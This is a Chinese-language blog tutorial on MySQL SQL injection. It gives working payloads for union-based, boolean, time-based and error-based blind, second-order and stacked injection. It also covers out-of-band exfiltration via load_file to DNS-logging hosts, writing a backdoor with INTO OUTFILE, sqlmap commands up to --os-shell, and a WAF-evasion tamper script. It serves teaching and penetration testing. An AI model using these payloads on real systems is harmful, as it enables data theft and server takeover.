• SQL注入原理及思路(mysql)


    数据库知识

    1. mysql数据库
    2. show database; #列出所有数据库
    3. show tables; #列出所有表名
    4. show columns from 表名; #列出表的列
    5. select * from 表名 #查询数据库中某表的信息
    6. select * from 表名 where 列=xx #查询某表中符合列=xx的信息
    7. select * from 表名 order by 数字 #用于将结果集按照某列进行排序(asc 升序desc 降序),在sql注入中通常用来判断前面查询结果集的列数,用于联合union查询
    8. select * from 表名1 union select * from 表名2 #union操作符用于合并两个或多个select语句的结果。但是必须保证前后的select语句必须保证拥有相同数量的列,
    9. insert into 表名(`列1`,`列2`,`列3`) values ('值1','值2','值3');#给表中添加数据
    10. delete from 表名 where 列=xx;#删除表中数据
    11. update 表名 set 列=xx where 条件;#修改数据
    12. 对于mysql5.0以上版本,有数据库information_schema存放数据库所有信息
    13. schemata表(存放所有的数据库):schema_name列(所有的数据库名)
    14. tables表(存放所有的表信息):table_schema列(数据库名) table_name列(表名)
    15. columns表(存放所有的列信息):table_schema列(数据库名) table_name列(表名)column_name列(列名)
    16. select * from 表名 limit 3/limit 0,1; #只有一个参数值时将表中前三条数据列出来;两个参数是从0行开始取1条数据

    SQL注入原理

    SQL注入有两个前提条件:源码中有执行的sql语句、参数可控且未对参数进行过滤;满足以上两个条件我们就可以任意构造sql语句且执行,从而获取我们想要的信息。

    SQL注入思路

    无任何过滤机制

    无符号干扰
    1. 针对url中?id=1的思路
    2. 源码:$id=$_GET['id'] ?? '1';$sql="select * from news where id=$id";//最原始、没有任何过滤的情况
    3. ?id=1 order by 数字 //数字从1开始试探,直到页面和之前不一样;用于判断select查询结果的列数
    4. ?id=1 union select 1,2,3 //此处的数字写到上面猜解出的列数;此时查看页面是否返回数字(不返回的话换出id=-1让其报错)
    5. 当页面报出对应数字之后,我们将其数字改成想要查询内容的函数;数据库版本version()-判断是否符合information_schema查询(mysql5.0以上版本有)、当前用户user()-是否符合root型攻击、当前操作系统@@version_compile_os()-看是否支持大小写或文件路径选择、查询当前数据库database()-便于后面猜解该数据库下的表
    6. ?id=1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='数据库名' //查询该数据库下的所有表名
    7. ?id=1 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema="数据库名" and table_name="表名" //查询数据库名下表名中的所有列名
    8. ?id=1 union select 1,2,"列名" from "表名" limit 0,1 //查询想要的信息
    9. 如果是root用户具有管理员权限,即可进行跨库查询
    10. ?id=1 union select 1,2 group_concat(schema_name) from information_schema.schemata //查询所有数据库名
    11. 知道数据库名之后继续按照上面思路一一猜解信息
    12. 如果是root用户且secure-file-priv未设置,可进行文件读写
    13. ?id=1 union select 1,load_file('d:\\1.txt') //读取D盘下文件1.txt内容
    14. ?i=1 union select 1,'后门代码' into outfile 'd:\\2.txt' //如果我们可以把后门代码写入网站目录下则可以直接连接,前提是获取到网络目录(报错显示获取路径、phpinfo页面泄露、利用中间件默认配置文件获取)
    15. 如果是对引号有过滤的话,我们可以对引号的内容进行十六进制编码绕过。
    有符号干扰 

    上面这种在源码中的id=$id是不带引号的,如果带引号的话我们在每一步之前都要先闭合引号再构造sql语句。

    1. 针对url中?id='1'的思路
    2. 源码:$id=$_GET['id'] ?? '1';$sql="select * from news where id='$id'";//思路同上,就是在id的值后面加一个引号进行闭合,在最后面加一个注释符# --+
    3. $id=$_GET['id'] ?? '1';$sql="select * from news where id='%$id%'";//在id的值后面加上%'闭合,最后加上注释符
    4. $id=$_GET['id'] ?? '1';$sql="select * from news where id=('$id')";//在id的值后面加')闭合,最后加注释符
    5. $id=$_GET['id'] ?? '1';$sql="select * from news where (id='$id')";//在id的值后面加')闭合,最后加注释符
    6. 总结:
    7. SQL语句由于在黑盒中是无法预知写法的,SQL注入能发成功是需要拼接原SQL语句,大部分黑盒能做的就是分析后各种尝试去判断,所以有可能有注入但可能出现无法注入成功的情况。究其原因大部分都是原SQL语句的未知性导致的拼接失败!
    其它注入点(post、数据包头部信息)
    1. 上面的都是以get提交的注入点,通常只要在源码中存在与数据库交互的地方都有可能存在注入点(post提交的数据、http头等)
    2. post表单提交数据:可以使用火狐post提交数据测试,测试思路同get方式,只是这个需要以post提交数据
    3. 数据包头部
    4. user-agent:使得服务器能够识别客户使用的操作系统,浏览器版本等等
    5. X-Forwarded-For:简称XFF头,它代表客户端,也就是HTTP的请求端真实的IP,(通常一些网站的防注入功能会记录请求端真实IP地址并写入数据库or某文件[通过修改XXF头可以实现伪造IP]);有些网站如果使用的是xff获取我们ip,我们可以通过修改数据包中的xff字段进行绕过ip检测
    6. 在http头中注入通常都是抓包,然后在数据包中修改头部信息进行尝试注入

    SQL盲注

    盲注就是在注入过程中,获取的数据不能回显至前端页面。我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

    基于布尔的盲注

    条件:该盲注必须有回显,用于判断构造的sql语句是否正确。(通常情况下只有select查询才会有回显,其余的增删改并没有回显)

    1. 在注入点构造sql语句:
    2. and length(database())=7 #用于判断数据库名称位数,如果猜对页面正常显示,否则页面错误
    3. and left(database(),1)='d'; #用于判断数据库名第一位是否为d
    4. and left(database(),2)='de'; #用于判断数据库名前两位是否为de

    基于时间的盲注-延时判断

    不需要任何条件

    1.  构造sql语句
    2. and if(length(database())=7,sleep(10),sleep(0)) #根据是否执行sleep函数判断数据库名字的长度
    3. and if(left(database(),1)='d',sleep(10),sleep(0)) #根据sleep函数判断数据库名第一个字符是否为d
    4. or if(ord(left(database(),1))=107,sleep(2),0) #107是字母k对应的ASCII码,当存在过滤引号时候可以使用ASCII替换
    5. 这个时间我们可以通过使用工具bp来判断,在bp的repeater中右下角会显示返回数据包所用时间。

    基于报错的盲注

    条件:有数据库报错处理判断标准

    源码:mysqli_query($con,$sqlor die(mysqli_error($con));//关键就是在源码中有输出错误信息
    
    
    1. 在注入点构造sql语句
    2. and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1) //会在页面的报错信息中显示版本
    3. and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

    mysql二次注入

    原理:

    1. 插入恶意数据,第一次进行数据库插入数据的时候,仅仅对其中的特殊字符进行了转义(addslashes转义函数,转义是关键否则不能造成二次注入),在写入数据库的时候还保留了原来的数据,但是数据本身包含恶意内容
    2. 引用恶意数据,在将数据存入到数据库中之后,开发者就认为数据是可信的。在下一次要进行查询的时候,直接从数据库中取出了恶意数据,没有进一步的处理和检验,这样就造成了二次注入。
    1. 场景:
    2. 在我们注册且登陆之后,有修改密码功能,该功能只需要我们输入旧密码和新密码即可;在注册时候可以插入恶意数据,下面语句正常插入的前提是有转义
    3. 用户名:admin ' and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)#
    4. 在修改密码的时候就会执行:
    5. select * from users where username='$username' and password='$password //此时就会上面的用户名待人该sql语句执行

    堆叠注入

    原理:堆叠注入触发的条件很苛刻,就是在存在注入点的地方通过分号结束符同时执行多条sql语句,例如php中的mysqli_multi_query函数。与之相对应的mysqli_query()只能执行一条SQL,所以要想目标存在堆叠注入,在目标主机存在类似于mysqli_multi_query()这样的函数,根据数据库类型决定是否支持多条语句执行

    条件:目标存在sql注入点、目标未对分号进行过滤、目标数据库支持查询信息时执行多条sql语句。(eg:mysql、mssql、postgresql等等)

    1. 2019强网杯
    2. 堆叠注入但是对select过滤,无法直接执行select语句
    3. SeT @a=0x73656c65637420666c61672066726f6d20603139313938313039333131313435313460;prepare execsql from @a;execute execsql; //先对要执行的sql查询语句进行十六进制编码,然后赋值给@a

    带外查询

    条件:root高权限且支持load_file();主要解决的是没有回显问题

    平台:http://ceye.io

    http://www.dnslog.cn

    1. //查询security数据库emails表下第一个列名
    2. id=1 and load_file(concat("\\\\",(select column_name from information_schema.columns where table_schema='security' and table_name='emails' limit 0,1),".dbuh8a.ceye.io\\xxx.txt"))
    3. //查询字段值  数据库名为security 表名emails 列名id
    4. id=1 and load_file(concat("\\\\",(select id from security.emails limit 0,1),".dbuh8a.ceye.io\\xxx.txt"))
    5. 其中xxx.txt是随意写的,而.dbuh8a.ceye.io是带外平台中的dns

    自动化sql注入工具——sqlmap(基于数据库mysql)

    1. sqlmap -u "http://xxxx?artist=1" //判断是否有注入点
    2. sqlmap -u "http://xxxx?artist=1" --current-db //查看当前数据库 结果acuart
    3. sqlmap -u "http://xxxx?artist=1" --current-user //查看当前用户
    4. sqlmap -u "http://xxxx?artist=1" --tables -D acuart //查看当前数据库下所有表
    5. sqlmap -u "http://xxxx?artist=1" --columns -T users -D acuart //查看users表下所有列
    6. sqlmap -u "http://xxxx?artist=1" --dump -C "name,pass" -T users -D acuart//查询列name pass中的数据
    7. sqlmap -u "http://xxxx?artist=1" --dump-all -C "name,pass" -T users -D acuart//查询所有数据
    8. sqlmap -u "http://xxxx?artist=1" --is-dba//判断是否为高权限用户 current user is DBA: False这种情况就是低权限
    9. sqlmap -r xx.txt(文件为请求数据包和post提交数据,在注入点后面加*)//get方式注入点的方法
    10. -tamper=xxx.py //对于有waf或者编码等问题我们可以使用tamper脚本。
    11. -v 数字
    12. 0:只显示Python的回溯,错误和关键消息。 
    13. 1:显示信息和警告消息。 
    14. 2:显示调试消息。 
    15. 3:有效载荷注入。 
    16. 4:显示HTTP请求。 
    17. 5:显示HTTP响应头。 
    18. 6:显示HTTP响应页面的内容 
    19. --user-agent "" #自定义user-agent 默认是sqlmap
    20. --random-agent   #随机user-agent
    21. --time-sec=(2-5) #延迟响应,默认为5
    22. --level=(1-5) #要执行的测试水平等级,默认为1 
    23. --risk=(0-3) #测试执行的风险等级,默认为1 
    24. --proxy "http:/127.0.0.1:8888" #代理注入,便于抓包查看注入过程的数据包,sqlmap和bp联动
    25. 如果当前是高权限用户,可以使用以下命令:
    26. sqlmap -u "http://xxxx?artist=1" --sql-shell //可以执行sql命令
    27. --file-read "d:\\xx.txt" //读取文件xx.txt
    28. --file-write "d:\\xx.txt" --file-dest "/root/xx" //将本地d盘下xxx文件写入服务器root目录下xx文件
    29. --os-cmd=calc //执行cmd命令 弹出计算器
    30. --os-shell //执行shell命令
    31. --dbs //查看所有数据库

    1. """
    2. tamper脚本书写模板
    3. """
    4. from lib.core.enums import PRIORITY
    5. __priority__ = PRIORITY.LOW
    6. def dependencies():
    7. pass
    8. def tamper(payload, **kwargs):
    9. if payload:
    10.         payload = payload.replace('SELECT','sElEct')
    11.         payload = payload.replace('OR','Or')
    12.         payload = payload.replace('AND','And')
    13.         payload = payload.replace('SLEEP','SleeP')
    14.         payload = payload.replace('ELT','Elt')
    15. return payload

  • 相关阅读:
    开源库_20210224
    cuda11安装 nvidia-455配置报错 解决方法
    Apollo学习(超详细)
    Android掌控WiFi不完全指南
    jxTMS设计思想之结构
    K近邻模型
    Linux与shell命令行学习
    JSON转换List<Map<String, Object>>、Map<String, Object>
    redis分布式锁
    Linux C 中执行shell命令
  • 原文地址:https://blog.csdn.net/weixin_65049289/article/details/134090271